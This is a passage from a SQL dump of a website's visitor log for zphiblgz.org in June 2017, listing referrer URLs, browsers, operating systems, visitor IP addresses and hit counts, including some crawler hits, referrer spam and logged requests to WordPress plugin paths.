06','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','94.177.238.64','000',2,0),(5461,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.65.205.10','000',2,0),(5462,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.105.100.149','000',2,0),(5463,'2017-06-06','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.111.123','000',1,0),(5464,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.2','000',1,0),(5465,'2017-06-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.43.205','000',1,0),(5466,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','52.15.228.241','000',1,0),(5467,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.18','000',1,0),(5468,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.163','000',3,0),(5469,'2017-06-06','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','204.126.132.241','000',6,0),(5470,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.239.236.92','000',1,0),(5471,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',2,0),(5472,'2017-06-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(5473,'2017-06-06','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(5474,'2017-06-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','79.124.59.202','000',1,0),(5475,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',1,0),(5476,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.14','000',1,0),(5477,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.98.161','000',1,0),(5478,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.5.104.227','000',1,0),(5479,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(5480,'2017-06-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.96.155.3','000',1,0),(5481,'2017-06-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','87.118.122.50','000',1,0),(5482,'2017-06-06','http://zphiblgz.org','Firefox','Windows','28.0','','159.203.108.227','000',4,0),(5483,'2017-06-06','http://zphiblgz.org','Firefox','Windows','21.0','','159.203.108.227','000',3,0),(5484,'2017-06-06','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','159.203.108.227','000',2,0),(5485,'2017-06-06','http://zphiblgz.org','Firefox','Windows','29.0','','159.203.108.227','000',1,0),(5486,'2017-06-06','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','159.203.108.227','000',1,0),(5487,'2017-06-06','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','159.203.108.227','000',2,0),(5488,'2017-06-06','http://zphiblgz.org','Firefox','Macintosh','29.0','','159.203.108.227','000',1,0),(5489,'2017-06-06','http://www.zphibmaryland.org/chapters/','Chrome','Windows','58.0.3029.110','','134.192.180.120','000',8,0),(5490,'2017-06-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5491,'2017-06-06','http://zphiblgz.org','Firefox','Macintosh','42.0','','107.172.96.61','000',2,0),(5492,'2017-06-06','http://zphiblgz.org','Firefox','Windows','40.1','','24.200.103.67','000',2,0),(5493,'2017-06-06','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',1,0),(5494,'2017-06-07','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5495,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(5496,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.70.105.114','000',1,0),(5497,'2017-06-07','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','104.138.144.180','000',3,0),(5498,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(5499,'2017-06-07','http://zphiblgz.org/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','Chrome','Windows','42.0.2311.152','','216.244.86.114','000',1,0),(5500,'2017-06-07','http://zphiblgz.org','Firefox','Windows','40.1','','123.236.91.45','000',2,0),(5501,'2017-06-07','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(5502,'2017-06-07','http://zphiblgz.org','Firefox','Windows','40.1','','105.112.10.234','000',2,0),(5503,'2017-06-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',2,0),(5504,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',1,0),(5505,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.105.100.149','000',1,0),(5506,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.39.2','000',1,0),(5507,'2017-06-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.170.196','000',1,0),(5508,'2017-06-07','http://zphiblgz.org','Firefox','Windows','40.1','','202.62.89.86','000',2,0),(5509,'2017-06-07','http://zphiblgz.org','Firefox','Windows','40.1','','190.196.237.162','000',2,0),(5510,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.62.188.139','000',1,0),(5511,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',1,0),(5512,'2017-06-07','http://zphiblgz.org','Firefox','Windows','40.1','','122.55.96.36','000',2,0),(5513,'2017-06-07','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.211.38.161','000',1,0),(5514,'2017-06-07','http://zphiblgz.org','curl','Unknown','7.47.0','','95.211.38.161','000',1,0),(5515,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',2,0),(5516,'2017-06-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.78','000',5,0),(5517,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',1,0),(5518,'2017-06-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',11,0),(5519,'2017-06-07','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(5520,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.201.40.83','000',1,0),(5521,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.17.56.42','000',1,0),(5522,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.206.237.22','000',1,0),(5523,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.60','000',1,0),(5524,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.102.148.67','000',1,0),(5525,'2017-06-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','173.254.216.66','000',1,0),(5526,'2017-06-07','http://www.bing.com/search?q=zeta+phi+beta+lambda+gamma+zeta&src=IE-SearchBox&FORM=IENTSR','MSIE','Windows','11.0','','159.45.186.45','000',13,0),(5527,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.177.123.116','000',1,0),(5528,'2017-06-07','http://zphiblgz.org','Chrome','Android','43.0.2357.93','','172.58.35.18','000',1,0),(5529,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.171.43','000',2,0),(5530,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',2,0),(5531,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.115.87','000',1,0),(5532,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(5533,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',1,0),(5534,'2017-06-07','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.7','000',1,0),(5535,'2017-06-07','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.3','000',1,0),(5536,'2017-06-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',1,0),(5537,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.88','000',2,0),(5538,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.201.225.45','000',2,0),(5539,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.20','000',1,0),(5540,'2017-06-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.163.234.7','000',1,0),(5541,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.223.82.156','000',2,0),(5542,'2017-06-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.70.95.180','000',3,0),(5543,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','122.174.170.216','000',2,0),(5544,'2017-06-08','http://zphiblgz.org','Chrome','Android','41.0.2272.96','','54.236.1.13','000',1,0),(5545,'2017-06-08','http://zphiblgz.org','Firefox','Windows','52.0','','46.229.170.197','000',1,0),(5546,'2017-06-08','http://zphiblgz.org','Chrome','Windows','57.0.2987.98','','46.229.170.197','000',1,0),(5547,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.62','000',1,0),(5548,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',2,0),(5549,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','27.34.254.7','000',2,0),(5550,'2017-06-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.57','000',12,0),(5551,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.43','000',2,0),(5552,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.5','000',1,0),(5553,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','1.186.181.181','000',2,0),(5554,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(5555,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.63','000',1,0),(5556,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','188.129.212.210','000',2,0),(5557,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','37.186.104.129','000',1,0),(5558,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.217','000',1,0),(5559,'2017-06-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.163.234.4','000',3,0),(5560,'2017-06-08','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','87.198.120.212','000',1,0),(5561,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(5562,'2017-06-08','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','192.198.80.227','000',2,0),(5563,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.38.67','000',2,0),(5564,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.60','000',2,0),(5565,'2017-06-08','http://zphiblgz.org','panscient','Unknown','Unknown','','72.79.54.220','000',218,0),(5566,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','62.65.62.243','000',2,0),(5567,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','186.91.48.203','000',2,0),(5568,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.254.216.66','000',1,0),(5569,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','47.8.15.212','000',2,0),(5570,'2017-06-08','https://www.google.com/','Chrome','Windows','59.0.3071.86','','56.0.163.15','000',1,0),(5571,'2017-06-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(5572,'2017-06-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(5573,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',2,0),(5574,'2017-06-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5575,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(5576,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.141.27.54','000',1,0),(5577,'2017-06-08','http://zphiblgz.org','Firefox','Windows','40.1','','178.221.114.89','000',2,0),(5578,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.215.7','000',1,0),(5579,'2017-06-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','87.118.115.176','000',1,0),(5580,'2017-06-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.53','000',1,0),(5581,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.34.237.101','000',1,0),(5582,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.98.160','000',1,0),(5583,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',2,0),(5584,'2017-06-08','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','69.143.34.19','000',5,0),(5585,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.1.129','000',1,0),(5586,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.239.230.98','000',1,0),(5587,'2017-06-08','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5588,'2017-06-08','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.11.35','000',5,0),(5589,'2017-06-08','http://zphiblgz.org/','Edge','Macintosh','34.74843','','49.228.236.102','000',1,0),(5590,'2017-06-08','http://zphiblgz.org/','Edge','Macintosh','34.74843','','144.217.41.169','000',1,0),(5591,'2017-06-08','http://zphiblgz.org/','Edge','Macintosh','34.74843','','118.173.243.71','000',1,0),(5592,'2017-06-08','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','94.177.238.64','000',2,0),(5593,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.213.3.221','000',1,0),(5594,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.137.190.54','000',2,0),(5595,'2017-06-08','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','96.255.191.204','000',3,0),(5596,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.12','000',1,0),(5597,'2017-06-08','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','40.71.226.157','000',2,0),(5598,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.2','000',2,0),(5599,'2017-06-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(5600,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.115.87','000',2,0),(5601,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',2,0),(5602,'2017-06-09','http://zphiblgz.org/wp-content/plugins/contact.php','Chrome','Windows','5.0.375.99','','185.12.92.146','000',1,0),(5603,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.200.137','000',2,0),(5604,'2017-06-09','http://zphiblgz.org/contact/','Opera Next','Windows','19.0.1326.59','','155.133.38.215','000',3,0),(5605,'2017-06-09','http://zphiblgz.org','MSIE','Windows','8.0','','8.135.101.95','000',1,0),(5606,'2017-06-09','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','45.55.254.161','000',1,0),(5607,'2017-06-09','http://zphiblgz.org','MSIE','Windows','10.0','','45.55.254.161','000',3,0),(5608,'2017-06-09','http://zphiblgz.org','Firefox','Macintosh','29.0','','45.55.254.161','000',1,0),(5609,'2017-06-09','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','45.55.254.161','000',1,0),(5610,'2017-06-09','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','45.55.254.161','000',1,0),(5611,'2017-06-09','http://zphiblgz.org','MSIE','Windows','9.0','','45.55.254.161','000',2,0),(5612,'2017-06-09','http://zphiblgz.org','Safari','Macintosh','7.0.3','','45.55.254.161','000',1,0),(5613,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(5614,'2017-06-09','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/wp-ajax.php','Chrome','Windows','5.0.375.99','','93.157.177.123','000',1,0),(5615,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.4','000',2,0),(5616,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.11','000',1,0),(5617,'2017-06-09','http://zphiblgz.org','Chrome','Windows','41.0.2220.0','','192.198.80.227','000',2,0),(5618,'2017-06-09','https://www.google.com/','Safari','iPhone','10.0','','174.227.138.182','000',1,0),(5619,'2017-06-09','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','95.213.184.251','000',6,0),(5620,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.164','000',2,0),(5621,'2017-06-09','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','74.208.150.202','000',1,0),(5622,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.78','000',1,0),(5623,'2017-06-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',16,0),(5624,'2017-06-09','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.171','000',29,0),(5625,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.151.224.153','000',2,0),(5626,'2017-06-09','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','84.54.153.242','000',1,0),(5627,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(5628,'2017-06-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','91.197.234.102','000',1,0),(5629,'2017-06-09','http://zphiblgz.org/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','Chrome','Windows','42.0.2311.152','','216.244.86.114','000',1,0),(5630,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.18','000',2,0),(5631,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.25','000',1,0),(5632,'2017-06-09','http://zphiblgz.org','curl','Unknown','7.29.0','','51.15.3.151','000',1,0),(5633,'2017-06-09','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(5634,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.223.82.156','000',2,0),(5635,'2017-06-09','http://zphiblgz.org','Firefox','Windows','36.0','','69.175.60.74','000',1,0),(5636,'2017-06-09','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.86','000',1,0),(5637,'2017-06-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.39.2','000',1,0),(5638,'2017-06-09','http://zphiblgz.org','Firefox','Windows','40.1','','123.195.126.57','000',2,0),(5639,'2017-06-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','198.204.244.162','000',3,0),(5640,'2017-06-10','http://zphiblgz.org','Firefox','Windows','40.1','','217.104.93.253','000',2,0),(5641,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',1,0),(5642,'2017-06-10','http://zphiblgz.org','Firefox','Windows','40.1','','94.66.56.85','000',2,0),(5643,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.134','000',1,0),(5644,'2017-06-10','http://zphiblgz.org','Firefox','Windows','40.1','','178.23.219.11','000',2,0),(5645,'2017-06-10','https://www.google.com/','Chrome','Windows','58.0.3029.110','','32.215.8.79','000',2,0),(5646,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.13','000',2,0),(5647,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',2,0),(5648,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.62.213.147','000',1,0),(5649,'2017-06-10','http://zphiblgz.org/','Firefox','Windows','7.0.1','','173.254.216.66','000',1,0),(5650,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.60','000',2,0),(5651,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.12','000',2,0),(5652,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.249.145.164','000',1,0),(5653,'2017-06-10','http://zphiblgz.org/','Firefox','Windows','7.0.1','','93.174.93.133','000',1,0),(5654,'2017-06-10','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','95.213.184.251','000',4,0),(5655,'2017-06-10','http://zphiblgz.org','Firefox','Macintosh','29.0','','138.197.111.119','000',1,0),(5656,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(5657,'2017-06-10','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.11','000',1,0),(5658,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',1,0),(5659,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',2,0),(5660,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',2,0),(5661,'2017-06-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(5662,'2017-06-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',4,0),(5663,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(5664,'2017-06-10','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.169.135.133','000',1,0),(5665,'2017-06-10','http://m.facebook.com','AppleWebKit','iPhone','603.2.4','','73.200.104.171','000',1,0),(5666,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.230.97','000',2,0),(5667,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.169.32.248','000',1,0),(5668,'2017-06-10','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.49.215','000',1,0),(5669,'2017-06-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.8','000',2,0),(5670,'2017-06-10','http://zphiblgz.org/wp-includes/logo_img.php','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(5671,'2017-06-10','http://zphiblgz.org','Firefox','Windows','48.0','','149.56.173.81','000',2,0),(5672,'2017-06-11','http://zphiblgz.org','Firefox','Windows','23.0','','159.203.91.98','000',1,0),(5673,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',1,0),(5674,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.200.131','000',2,0),(5675,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.4','000',1,0),(5676,'2017-06-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','121.42.52.27','000',4,0),(5677,'2017-06-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5678,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.200.135','000',1,0),(5679,'2017-06-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.12','000',1,0),(5680,'2017-06-11','https://www.google.com/','Safari','iPhone','10.0','','76.205.242.213','000',1,0),(5681,'2017-06-11','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',2,0),(5682,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','107.150.94.26','000',2,0),(5683,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(5684,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.2','000',2,0),(5685,'2017-06-11','http://zphiblgz.org/','Opera','Windows','9.10','','124.77.180.31','000',1,0),(5686,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.48','000',2,0),(5687,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.197.207.243','000',2,0),(5688,'2017-06-11','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','37.218.245.25','000',1,0),(5689,'2017-06-11','http://zphiblgz.org','Firefox','Windows','40.1','','5.174.55.93','000',2,0),(5690,'2017-06-11','http://zphiblgz.org/wp-includes/security.php','Chrome','Windows','5.0.375.99','','46.38.230.11','000',1,0),(5691,'2017-06-11','http://zphiblgz.org/','Edge','Windows','15.15063','','5.2.75.199','000',1,0),(5692,'2017-06-11','http://volgograd.zrus.org/','MSIE','Windows','5.5','','46.118.123.232','000',1,0),(5693,'2017-06-11','http://zphiblgz.org','Firefox','Windows','40.1','','14.192.142.105','000',2,0),(5694,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','208.113.166.5','000',1,0),(5695,'2017-06-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(5696,'2017-06-11','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(5697,'2017-06-11','http://www.marinetraffic.com','MSIE','Unknown','9.0','','139.227.145.230','000',1,0),(5698,'2017-06-11','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','138.197.66.234','000',3,0),(5699,'2017-06-11','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.66.234','000',3,0),(5700,'2017-06-11','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.66.234','000',2,0),(5701,'2017-06-11','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.66.234','000',2,0),(5702,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','150.145.1.88','000',1,0),(5703,'2017-06-11','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.7.111','000',1,0),(5704,'2017-06-11','http://zphiblgz.org','Firefox','Macintosh','29.0','','138.197.7.111','000',2,0),(5705,'2017-06-11','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.7.111','000',2,0),(5706,'2017-06-11','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.7.111','000',3,0),(5707,'2017-06-11','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','138.197.7.111','000',1,0),(5708,'2017-06-11','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','138.197.7.111','000',1,0),(5709,'2017-06-11','http://zphiblgz.org/wp-content/wflogs/rules.php','Chrome','Windows','5.0.375.99','','78.46.92.203','000',2,0),(5710,'2017-06-11','http://zphiblgz.org/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','Chrome','Windows','42.0.2311.152','','216.244.86.114','000',1,0),(5711,'2017-06-11','http://zphiblgz.org/wp-content/themes/kuma/db.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(5712,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.14','000',2,0),(5713,'2017-06-11','http://zphiblgz.org','Firefox','Windows','40.1','','93.70.233.230','000',2,0),(5714,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.66.162','000',1,0),(5715,'2017-06-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(5716,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.200.20.46','000',2,0),(5717,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',2,0),(5718,'2017-06-11','http://zphiblgz.org/wp-content/plugins/wp_module/wp_msg.php','Chrome','Windows','5.0.375.99','','85.114.133.143','000',1,0),(5719,'2017-06-11','http://zphiblgz.org','Firefox','Windows','40.1','','125.162.64.138','000',2,0),(5720,'2017-06-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.160.21.5','000',1,0),(5721,'2017-06-11','http://freza-sverlo.ru/','MSIE','Windows','6.0','','46.118.117.131','000',3,0),(5722,'2017-06-11','http://kozhniebolezni.com/','MSIE','Windows','6.0','','37.115.187.118','000',2,0),(5723,'2017-06-11','http://barnaul.zrus.org/','MSIE','Windows','6.0','','46.118.123.232','000',8,0),(5724,'2017-06-11','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.96','000',1,0),(5725,'2017-06-12','http://zphiblgz.org/wp-content/plugins/etc.php','Chrome','Windows','5.0.375.99','','46.45.143.35','000',1,0),(5726,'2017-06-12','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',2,0),(5727,'2017-06-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.235.145.36','000',2,0),(5728,'2017-06-12','http://videochat.cafe/','MSIE','Windows','6.0','','46.118.158.86','000',1,0),(5729,'2017-06-12','http://zphiblgz.org','Chrome','Macintosh','50.0.2703.19','','185.180.231.8','000',1,0),(5730,'2017-06-12','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','202.47.1.217','000',1,0),(5731,'2017-06-12','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','93.188.37.174','000',2,0),(5732,'2017-06-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',2,0),(5733,'2017-06-12','https://pregnant.guru/','Opera','Windows','8.01','','109.162.67.12','000',3,0),(5734,'2017-06-12','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.61.44.59','0